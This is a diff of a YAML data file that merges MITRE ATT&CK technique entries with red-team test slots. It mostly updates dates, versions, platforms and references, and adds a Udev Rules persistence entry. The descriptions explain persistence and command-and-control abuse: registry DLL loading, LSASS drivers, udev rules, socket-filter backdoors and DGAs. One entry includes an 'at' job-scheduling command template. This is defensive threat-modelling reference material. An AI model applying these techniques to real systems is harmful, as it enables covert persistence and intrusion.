         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -42487,7 +42868,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -42546,7 +42927,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -42572,7 +42952,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -42598,13 +42978,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -42628,8 +43006,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -42659,7 +43037,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -42702,7 +43079,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -42727,12 +43104,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -42772,8 +43148,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -42781,13 +43159,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -42818,17 +43196,14 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -42891,7 +43266,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -42925,8 +43300,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -42935,6 +43310,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -42947,7 +43326,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests:
     - name: At - Schedule a job
@@ -42997,7 +43375,7 @@ persistence:
         command: 'echo "#{at_command}" | at #{time_spec}'
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -43010,6 +43388,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -43046,17 +43425,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -43102,9 +43481,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -43141,7 +43576,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -43165,51 +43600,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -43232,20 +43627,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -43275,7 +43707,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -43299,12 +43731,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -43388,11 +43818,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -43444,9 +43873,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account (Linux)
@@ -43609,7 +44037,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -43647,14 +44075,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -43717,7 +44143,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -43775,7 +44200,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests:
     - name: Base64 Encoded data.
@@ -43833,92 +44257,91 @@ command-and-control:
         name: sh
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
